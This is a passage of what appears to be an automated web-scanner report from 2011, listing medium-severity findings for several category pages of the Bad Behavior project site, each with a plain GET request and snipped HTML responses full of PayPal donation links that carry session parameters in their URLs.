User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761987+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 43170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
mit me to do any further work on Bad Behavior, mainly due to the economic recession. If you want this work to continue, as I&#8217;ll outline in the roadmap below, skip your morning latte tomorrow and <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send me a financial contribution</a>
...[SNIP]...
>Only one thing remains, and that is to do the work. As I noted before, Bad Behavior is a user-supported project. If you think this roadmap looks good, and want to accelerate Bad Behavior development, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">your financial contribution</a>
...[SNIP]...
ling $500 or more would allow me time to complete the majority of the above within a month. I know that a lot of you are having financial trouble due to the economy; so am I. Even if you are unable to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send a contribution</a>
...[SNIP]...
<p>This is also the time to send in feature requests. If Bad Behavior doesn&#8217;t do something you would like it to do, please leave a comment. (And remember that feature requests accompanied by a <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">contribution</a>
...[SNIP]...
<p>Finally, if Bad Behavior has been valuable to you, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=yo8luBOaKVL-Rhxg2AWxXUd7AFvPOVLb_7_hq3YexObc1w1uDFQFh0V0lyi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a contribution to further Bad Behavior development</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.38. http://bad-behavior.ioerror.us/category/expressionengine/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/expressionengine/

Request

GET /category/expressionengine/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761990+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 65218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
mit me to do any further work on Bad Behavior, mainly due to the economic recession. If you want this work to continue, as I&#8217;ll outline in the roadmap below, skip your morning latte tomorrow and <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send me a financial contribution</a>
...[SNIP]...
>Only one thing remains, and that is to do the work. As I noted before, Bad Behavior is a user-supported project. If you think this roadmap looks good, and want to accelerate Bad Behavior development, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">your financial contribution</a>
...[SNIP]...
ling $500 or more would allow me time to complete the majority of the above within a month. I know that a lot of you are having financial trouble due to the economy; so am I. Even if you are unable to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send a contribution</a>
...[SNIP]...
<p>This is also the time to send in feature requests. If Bad Behavior doesn&#8217;t do something you would like it to do, please leave a comment. (And remember that feature requests accompanied by a <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">contribution</a>
...[SNIP]...
<p>Finally, if Bad Behavior has been valuable to you, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=yo8luBOaKVL-Rhxg2AWxXUd7AFvPOVLb_7_hq3YexObc1w1uDFQFh0V0lyi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a contribution to further Bad Behavior development</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=z78SMJXy0RjExwIdpf6faDfTANdBGkovEwEQ58eAU0cJkqb9HsqeblLceQm&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=z78SMJXy0RjExwIdpf6faDfTANdBGkovEwEQ58eAU0cJkqb9HsqeblLceQm&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ACf1pAEEuOec-mg5x3Al9iKWoJfgx2HofQTBYoYBB-sI53r3_bCbRWwzaOa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ACf1pAEEuOec-mg5x3Al9iKWoJfgx2HofQTBYoYBB-sI53r3_bCbRWwzaOa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=hT6NeSH3Bvc7ef-pgZLPL6IMW11fkq1e4aYNxJBRwaJ3MpFrQHb-HDxJo8q&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Before I get into the release announcement, I just want to ask all of you to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=DsneidDZRM7YCqQbgpeRCi_g06eFtZ96jVRNOA4muBESGigHG_iBV1h8HzS&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">send me money</a>
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=hT6NeSH3Bvc7ef-pgZLPL6IMW11fkq1e4aYNxJBRwaJ3MpFrQHb-HDxJo8q&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=V7m71K6vG1v9ZIX96o4LS33Kkyuzti0CM-kR-Y3Nix9eSeuwDLy7NjBosz8&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=V7m71K6vG1v9ZIX96o4LS33Kkyuzti0CM-kR-Y3Nix9eSeuwDLy7NjBosz8&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.39. http://bad-behavior.ioerror.us/category/internet/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/internet/

Request

GET /category/internet/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762014+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 41907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=WPuUr2Je7MepjdvvyTy5R-k_OtjQmatQkFRYel6IRQFTPferUaPt2TUhJWC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=WPuUr2Je7MepjdvvyTy5R-k_OtjQmatQkFRYel6IRQFTPferUaPt2TUhJWC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.40. http://bad-behavior.ioerror.us/category/joomla/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/joomla/

Request

GET /category/joomla/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762040+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 36968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
mit me to do any further work on Bad Behavior, mainly due to the economic recession. If you want this work to continue, as I&#8217;ll outline in the roadmap below, skip your morning latte tomorrow and <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send me a financial contribution</a>
...[SNIP]...
>Only one thing remains, and that is to do the work. As I noted before, Bad Behavior is a user-supported project. If you think this roadmap looks good, and want to accelerate Bad Behavior development, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">your financial contribution</a>
...[SNIP]...
ling $500 or more would allow me time to complete the majority of the above within a month. I know that a lot of you are having financial trouble due to the economy; so am I. Even if you are unable to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send a contribution</a>
...[SNIP]...
<p>This is also the time to send in feature requests. If Bad Behavior doesn&#8217;t do something you would like it to do, please leave a comment. (And remember that feature requests accompanied by a <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">contribution</a>
...[SNIP]...
<p>Finally, if Bad Behavior has been valuable to you, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=yo8luBOaKVL-Rhxg2AWxXUd7AFvPOVLb_7_hq3YexObc1w1uDFQFh0V0lyi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a contribution to further Bad Behavior development</a>
...[SNIP]...

5.41. http://bad-behavior.ioerror.us/category/lifetype/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/lifetype/

Request

GET /category/lifetype/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762040+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 64578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
mit me to do any further work on Bad Behavior, mainly due to the economic recession. If you want this work to continue, as I&#8217;ll outline in the roadmap below, skip your morning latte tomorrow and <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send me a financial contribution</a>
...[SNIP]...
>Only one thing remains, and that is to do the work. As I noted before, Bad Behavior is a user-supported project. If you think this roadmap looks good, and want to accelerate Bad Behavior development, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">your financial contribution</a>
...[SNIP]...
ling $500 or more would allow me time to complete the majority of the above within a month. I know that a lot of you are having financial trouble due to the economy; so am I. Even if you are unable to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send a contribution</a>
...[SNIP]...
<p>This is also the time to send in feature requests. If Bad Behavior doesn&#8217;t do something you would like it to do, please leave a comment. (And remember that feature requests accompanied by a <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=YWGAQR2jNWe88KWbpF3DSYi2X5KixQlNdgWJNFwCI5xVUZ8ma3TneFuPt3a&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=YWGAQR2jNWe88KWbpF3DSYi2X5KixQlNdgWJNFwCI5xVUZ8ma3TneFuPt3a&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
<p>Finally, if Bad Behavior has been valuable to you, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=yo8luBOaKVL-Rhxg2AWxXUd7AFvPOVLb_7_hq3YexObc1w1uDFQFh0V0lyi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a contribution to further Bad Behavior development</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=wuCX6JDUDuOIa7rG97-dHgUBF3ERMjtjfY5rWZz9c2zlkqGrui0dGy_4d64&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>In the meantime, Bad Behavior remains a user-supported project, with all code released under the GNU General Public License. If you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=wuCX6JDUDuOIa7rG97-dHgUBF3ERMjtjfY5rWZz9c2zlkqGrui0dGy_4d64&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=1DwLg5XtP55UVCR7PlAkyXK-rjrsQyJbHZgy410xNAfMaIcq3Vo657C4MPa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=1DwLg5XtP55UVCR7PlAkyXK-rjrsQyJbHZgy410xNAfMaIcq3Vo657C4MPa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.42. http://bad-behavior.ioerror.us/category/mediawiki/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/mediawiki/

Request

GET /category/mediawiki/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762042+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 79518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
